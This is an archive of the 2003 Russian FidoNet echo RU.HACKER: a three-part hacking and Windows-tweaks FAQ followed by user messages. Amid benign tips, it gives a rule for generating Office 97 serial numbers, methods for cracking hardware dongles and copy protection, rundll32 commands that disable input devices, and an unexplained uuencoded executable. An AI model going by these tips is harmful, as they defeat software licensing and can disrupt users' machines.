попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6073 [1-10330] K/s From : Moderator's Post 13-Jul-03 00:00:00 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6074 [1-10330] K/s From : Moderator's Post 13-Jul-03 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6075 [1-10330] From : Denis N. Voituk 13-Jul-03 08:24:12 2:5012/38.1 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= np: Sanches - Compupank [paused] Howdy Mike? 19:19, 12 Июля 2003. Ты взглянул(а) на меня и сказал(а): EB>>> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют DV>> Вряд ли ты найдешь какое-нить приемлемое решение... MZ> Забыл добавить имхо... Фраза "вряд ли" это подразумевает. MZ> Все зависит от алгоритма защиты, как вариант CRC области биоса... Ы? И че? Думаешь, так трудно взломать? Да влегкую! Сделай, я взолмаю, если не веришь DV>> Придется перейти на компиляторы под Win и там уже защиту DV>> навешивать. MZ> Брехня! (с) :) Твое право так считать, но я еще не видел нормально защищенных досовых прог... Во многих интересная защита ввиде проверки прошедшего времени между командами, но это обходится как не фиг делать, если головой немного подумать /See ya Mike. [Z7N1510C, 7:1510/37, 7:1510/38] --- legere enim et non intellegere neglegere est * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6076 [1-10330] From : Pavel Fomin 13-Jul-03 12:09:15 2:5026/49.21 To : Mike Zhuravlev 2:5020/1683 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hi Mike! 12 Jul 03 19:19, you wrote to Denis N. Voituk: EB>>> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют MZ> [Skip] DV>> Вряд ли ты найдешь какое-нить приемлемое решение... MZ> Забыл добавить имхо... Все зависит от алгоритма защиты, как вариант CRC MZ> области биоса... Ы? И? Мне одна такая попадалась - под Дельфой писаная. Привязывалась к фрагменту BIOS'а (+отдельно дата от него) и области параметров CMOS'а! Соответственно под NT-based системами AV выдавала. Решение - нашел в exe свободное место, записал туда правильные данные (BIOS'а и CMOS'а), процедуры обращения перенаправил туда - и ВСЕ! И теперь и под NT пашет как миленькая Для DOS-RM искать такие места может чуть сложнее, но совершенно не смертельно. В качестве варианта защиты - динамическое шифрование-расшифрование. Может применяться и для DOS'а. Контроль целостности шифруемого/расшифровываемого блока. Защиту реальзовывать через int1/3. Шифровать фрагменты кода, при выходе зашифровывать. Это против взлома. А под ней - уже привязку к чему-либо Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 6077 [1-10330] From : Dmitry Sidorov 13-Jul-03 18:53:28 2:5009/5.10 To : All 2:5009/5.10 Subj : OpenBSD!???... =====================================================================RU.HACKER= Здорово, народ! Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив OpenBSD 3.3, но как его поставить так и не врубился.... Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD поставился. А какой гадкий тама fdisk - ничего не понятно... Заранее спасибо за ответ, Dmitry --- GoldED/386 3.00.Beta5+ * Origin: ...........:) (2:5009/5.10) = Здесь обитают хакеры ====================================================New= Msg : 6078 [1-10330] From : Dmitry Usachov 14-Jul-03 02:02:48 2:5070/717.44 To : Dmitry Sidorov 2:5009/5.10 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Dmitry! DS> Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив DS> OpenBSD 3.3, но как его поставить так и не врубился.... DS> Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD DS> поставился. А какой гадкий тама fdisk - ничего не понятно... Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М от начала диска, иначе "Bad Magic" - проверял В документации все понятно написано. fdisk действительно несколько архаичен, но разве у тебя нет на столе калькулятора, чтобы offset'ы вычислять? :) Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 6079 [1-10330] From : Dmitry Usachov 14-Jul-03 02:23:12 2:5070/717.44 To : Dmitry Sidorov 2:5009/5.10 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Dmitry! DS> Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив DS> OpenBSD 3.3, но как его поставить так и не врубился.... DS> Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD -----< Started Text File: >----- For this reason, the entire /bsd file (the kernel) must be located on the disk within the boot ROM addressable area, or within the first 8G of the disk, whichever is smaller. This means that on some older i386 systems, the root partition must be completely within the first 504M, but for most newer computers, the root partition may be anywhere within the first 8G Note that it is possible to install a 40G drive on an old 486 and load OpenBSD on it as one huge partition, and think you have successfully violated the above rule. However, it might come back to haunt you in a most unpleasant way You install on the 40G / partition. It works, because the base OS and all its files (including /bsd) are within the first 504M You use the system, and end up with more than 504M of files on it. You upgrade, build your own kernel, whatever, and copy your new /bsd over the old one You reboot. You get a message such as "bad magic" -----< Text File finished >----- Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 6080 [1-10330] From : Dmitry Yatsenko 13-Jul-03 18:46:31 2:464/97.333 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : Re: ICQ =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Vitaly?!_ 13 июля 2003 00:31, *Vitaly Cheprasov aka Fanatik* тревожил тебя, _All_, и тут я решил вмешаться: VCaF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом Какой версии? VCaF> компе.... VCaF> можHо достать пароль...и чем???? Можно. Программкой ICQr Information или ей подобными. У меня есть, но для ICQ 99, 2001... VCaF> плиз...очеHь Hадо... Вот я и всё сказал тебе, *Vitaly Cheprasov aka Fanatik*. WBR, /Angorec/ /@np: [WinAmp] Deep Purple - Smoke on the water (quadrophon/ --- Hаша 'Крыша' 'Hебо голубое'... * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 6081 [1-10330] From : Vitaly Cheprasov aka Fanatik 14-Jul-03 01:26:28 2:5009/5.24 To : Dmitry Yatsenko 2:464/97.333 Subj : Re^2: ICQ =====================================================================RU.HACKER= Привет Dmitry! Воскресенье Июль 13 2003 18:46, Dmitry Yatsenko -> Vitaly Cheprasov aka Fanatik: DY> Какой версии? 2001 DY> Можно. Программкой ICQr Information или ей подобными. У меня DY> есть, но для ICQ 99, 2001... пришли плиз...uuecodoм..... С уважением Fanatik... --- ...CyberStudio...cyberstudio@tamb.ru * Origin: ...локальные сети...веб... (2:5009/5.24) = Здесь обитают хакеры ====================================================New= Msg : 6082 [1-10330] From : Alexandra Zanko 13-Jul-03 21:12:18 2:5038/1.60 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : ICQ =====================================================================RU.HACKER= Hello Vitaly VCa> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCa> можHо достать паpоль...и чем???? VCa> плиз...очеHь Hадо... В инете есть специальные pасшифpовщики аси...они откpывают dat файл и достают из него все, что тебе надо :) Поищи уpл я не знаю. веpнее знаю, но забыла , а искать влом :) Bye --- FIDO-rulezzzz!!! * Origin: Skip, if you tired... (2:5038/1.60) = Здесь обитают хакеры ====================================================New= Msg : 6083 [1-10330] From : Zaslavsky Andrew 12-Jul-03 01:35:02 2:5030/746.25 To : Evgeni Shabalin 2:5050/121.14 Subj : repwl =====================================================================RU.HACKER= Приветствую тебя , Evgeni ! Было начертано Evgeni Shabalin ─═ All: ES> Где можно достать сабж.Hапишите url.Заpание спасибо! а как насчет поиска? Всех благ тебе, *Evgeni*. Hаша страничка www.radionet.nm.ru * Origin: Hаглость - второе счастье. (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 6084 [1-10330] K/s From : Anton Mikhaylov 14-Jul-03 01:02:56 2:5066/45.666 To : Nikita Melikhov 2:5030/1081.63 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= ┌── [ _Здравствуй, Nikita_ ] ├── [ 09 Июл 03 03:44, Nikita Melikhov  Anton Mikhaylov ] AM>> Content-Type: text/html AM>> Content-Transfer-Encoding: base64 AM>> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg NM> [...] AM>> bD4NCg== AM>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>> кто-нить че-нить посоветовать может? NM> Дык, раскодируй (MIME64). Дык уже сделал! Пытаются впарить мне какой-то супер-пупер увеличитель полового члена без побочных эффектов. / Мне это нах не надо. Я на это не подписывался. Меня интересует другое: можно ли как-то вычислить откуда это идет и как от этого избавиться? ├── [ _До встречи, Nikita_ ] └── [ /_■_/ ЧГУ, ИВТ-12-01 ] [ __ Linkin Park, КиШ ] [ ** Hаташа ] --- GoldED+/W32 1.1.5-030609 + HPT 1.1.0/W32 